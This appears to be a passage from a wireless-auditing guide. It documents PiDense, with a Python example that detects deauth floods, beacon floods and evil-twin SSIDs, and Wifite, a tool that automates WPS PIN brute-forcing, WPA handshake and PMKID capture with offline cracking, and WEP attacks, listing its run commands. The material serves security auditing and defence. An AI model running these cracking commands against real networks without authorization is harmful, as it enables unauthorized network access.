PiDense operates by monitoring wireless network activities, analysing broadcast SSIDs and encryption types, and detecting anomalies. It uses scapy for packet capture and parsing, and raises alerts when suspicious activity is detected.
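The three checks above that matter most on an engagement, deauth floods, beacon floods and look-alike SSIDs, reduced to standard-library Python over raw 802.11 management frames, as an added example (this is not PiDense's code, which uses scapy). Frames are built inline to stand in for a monitor-mode capture with the radiotap header stripped; the thresholds and the 0.8 similarity cut-off are assumptions.

```python
"""Detection logic for the PiDense checks (deauth floods, beacon floods, look-alike SSIDs)
over raw 802.11 management frames. Added example with constructed frames."""
import struct
from collections import defaultdict
from difflib import SequenceMatcher

BCAST = b"\xff" * 6
DEAUTH_THRESHOLD = 5       # assumed: deauth/disassoc frames from one source per window
BSSID_THRESHOLD = 20       # assumed: distinct beaconing BSSIDs per window
WINDOW = 2.0               # assumed: seconds

def build_frame(subtype, addr1, addr2, addr3, body=b"", seq=0):
    """Management frame (type 0): frame control, duration, three addresses, sequence control, body."""
    fc = struct.pack("<H", (0 << 2) | (subtype << 4))
    return fc + b"\x00\x00" + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4) + body

def parse_frame(frame):
    """Pull type/subtype, addresses, the deauth reason code and the beacon SSID out of a raw frame."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "addr1": frame[4:10], "addr2": frame[10:16], "addr3": frame[16:22]}
    body = frame[24:]
    if info["type"] == 0 and info["subtype"] in (0xA, 0xC) and len(body) >= 2:
        info["reason"] = struct.unpack_from("<H", body, 0)[0]      # disassoc (0xA) / deauth (0xC)
    if info["type"] == 0 and info["subtype"] == 0x8 and len(body) >= 14:
        ies, i = body[12:], 0                                       # skip timestamp, interval, capability
        while i + 2 <= len(ies):
            tag, length = ies[i], ies[i + 1]
            if tag == 0:                                            # SSID information element
                info["ssid"] = ies[i + 2:i + 2 + length].decode("utf-8", "replace")
                break
            i += 2 + length
    return info

def detect(frames, known_ssids, window=WINDOW):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes) in capture order. Returns sorted alerts."""
    alerts = set()
    deauths = defaultdict(list)          # source MAC -> timestamps inside the window
    beacons = []                         # (timestamp, bssid) inside the window
    for ts, raw in frames:
        f = parse_frame(raw)
        if f["type"] != 0:
            continue
        if f["subtype"] in (0xA, 0xC):
            src = f["addr2"].hex(":")
            deauths[src] = [t for t in deauths[src] if ts - t <= window] + [ts]
            if len(deauths[src]) >= DEAUTH_THRESHOLD:
                kind = "broadcast" if f["addr1"] == BCAST else "targeted"
                alerts.add(f"deauth flood from {src} ({kind}, reason {f.get('reason')})")
        elif f["subtype"] == 0x8:
            bssid = f["addr3"].hex(":")
            beacons = [(t, b) for t, b in beacons if ts - t <= window] + [(ts, bssid)]
            if len({b for _, b in beacons}) >= BSSID_THRESHOLD:
                alerts.add("beacon flood: too many distinct BSSIDs in window")
            ssid = f.get("ssid", "")
            for known in known_ssids:
                if ssid != known and SequenceMatcher(None, ssid.lower(), known.lower()).ratio() >= 0.8:
                    alerts.add(f"look-alike SSID {ssid!r} resembles {known!r} from {bssid}")
    return sorted(alerts)

# Constructed capture: a real AP, a client leaving normally, an aireplay-ng -0 style broadcast
# deauth burst spoofing the AP, an evil-twin beacon, then an mdk3 b style beacon flood.
AP = bytes.fromhex("001122334455")
CLIENT = bytes.fromhex("002233445566")

def beacon(bssid, ssid):
    body = (b"\x00" * 8 + struct.pack("<H", 100) + struct.pack("<H", 0x0411)
            + bytes([0, len(ssid)]) + ssid.encode())
    return build_frame(0x8, BCAST, bssid, bssid, body)

def deauth(src, dst, reason):
    return build_frame(0xC, dst, src, src, struct.pack("<H", reason))

def sample_capture():
    frames = [(0.0, beacon(AP, "CorpNetwork")), (0.5, deauth(CLIENT, AP, 3))]
    frames += [(1.0 + i * 0.1, deauth(AP, BCAST, 7)) for i in range(10)]
    frames.append((1.5, beacon(bytes.fromhex("deadbeef0001"), "CorpNetw0rk")))
    frames += [(2.0 + i * 0.02, beacon(bytes([0x02, 0, 0, 0, 0, i]), f"free-wifi-{i}")) for i in range(25)]
    return sorted(frames, key=lambda x: x[0])

if __name__ == "__main__":
    for alert in detect(sample_capture(), ["CorpNetwork"]):
        print(alert)
```

A single deauth with reason 3 (station leaving) is normal and never alerts; the burst from the AP's own MAC to the broadcast address is the signature of aireplay-ng -0 without -c, and the same logic flags the mdk3 a/b floods from the DoS section. Feed real frames by stripping the radiotap header (its length is in bytes 2-3) before calling parse_frame.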
Installation and Usage
Requirements
Hardware: a wireless adapter that supports monitor mode; the project lists the TP-LINK TL-WN722N (the v1 model with the Atheros AR9271 chipset works out of the box on Kali, while the v2/v3 Realtek variants need out-of-tree drivers)
Modules: scapy and termcolor (time and argparse are part of the Python standard library)
Operating System: Kali Linux
Command Options
The following table summarises the commands needed to install and run PiDense.
git clone https://github.com/WiPi-Hunter/PiDense.git
Clone the PiDense repository from GitHub
pip install scapy termcolor
Install the required third-party Python modules
airmon-ng start wlan0
Enable monitor mode on wlan0 using airmon-ng (creates wlan0mon); alternatively do it by hand with the next three commands
ifconfig wlan0 down
Bring down the wlan0 interface
iwconfig wlan0 mode Monitor
Set wlan0 to monitor mode
ifconfig wlan0 up
Bring up the wlan0 interface
cd PiDense
Navigate to the PiDense directory
python pidense.py -h
Display help information for PiDense
Wifite: Wireless Network Auditing Tool
Wifite is a comprehensive Python script for auditing wireless networks, leveraging existing tools to automate the process of retrieving wireless access point passwords. This guide provides a detailed overview of Wifite’s features, installation, usage, and command options.
Purpose
Wifite automates wireless network attacks by utilizing various existing tools to perform the following actions:
WPS Offline Pixie-Dust attack
WPS Online Brute-Force PIN attack
WPA Handshake Capture + offline crack
WPA PMKID Hash Capture + offline crack
Various known WEP attacks
Key Features
WPS Pixie-Dust Attack: Offline brute-force attack on WPS
WPS PIN Attack: Online brute-force attack on the WPS PIN
WPA Handshake Capture: Captures the WPA handshake for offline cracking
WPA PMKID Hash Capture: Captures PMKID hashes for offline cracking
WEP Attacks: Supports multiple WEP attacks including fragmentation, chop-chop, aireplay, etc.
5GHz Support: Supports the 5GHz band for some wireless cards
Automatic Handshake Validation: Validates handshakes with pyrit, tshark, cowpatty, and aircrack-ng
Cracked Password Storage: Stores cracked passwords and handshakes in the current directory
Verbose Mode: Provides detailed output of executed commands for educational purposes
Compatibility: Designed for Kali Linux and ParrotSec, with Python 3 support
Installation
Prerequisites
Wireless card capable of Monitor Mode and packet injection
Python (compatible with both Python2 and Python3)
Required Tools: iwconfig, ifconfig, aircrack-ng suite, tshark, reaver, bully, coWPAtty, pyrit, hashcat, hcxdumptool, hcxpcaptool
Usage
Command-Line Interface
usage: Wifite.py [options]
Wifite is a tool to automate wireless security auditing.
optional arguments:
-h, --help show this help message and exit
-i, --iface set the wireless interface (default: auto)
-c, --channel set the channel (default: all channels)
--pmkid only capture PMKID hashes (skips the WPS and handshake attacks)
--pixie use Pixie-Dust attack (default: enabled)
--no-pixie disable Pixie-Dust attack
--wps-only attack only WPS-enabled networks
--no-wps do not attack WPS-enabled networks
--crack crack captured handshakes/PMKID hashes with a wordlist
--dict set the wordlist used for cracking
--no-deauths do not send deauth packets
-v, --verbose increase verbosity of output
Examples
Run Wifite with Default Settings:
sudo ./Wifite.py
Capture PMKID Hashes Only:
sudo ./Wifite.py --pmkid
Disable Pixie-Dust Attack:
sudo ./Wifite.py --no-pixie
Attack Only WPS-Enabled Networks:
sudo ./Wifite.py --wps-only
Crack Captured Handshakes with a Wordlist:
sudo ./Wifite.py --crack --dict /path/to/wordlist.txt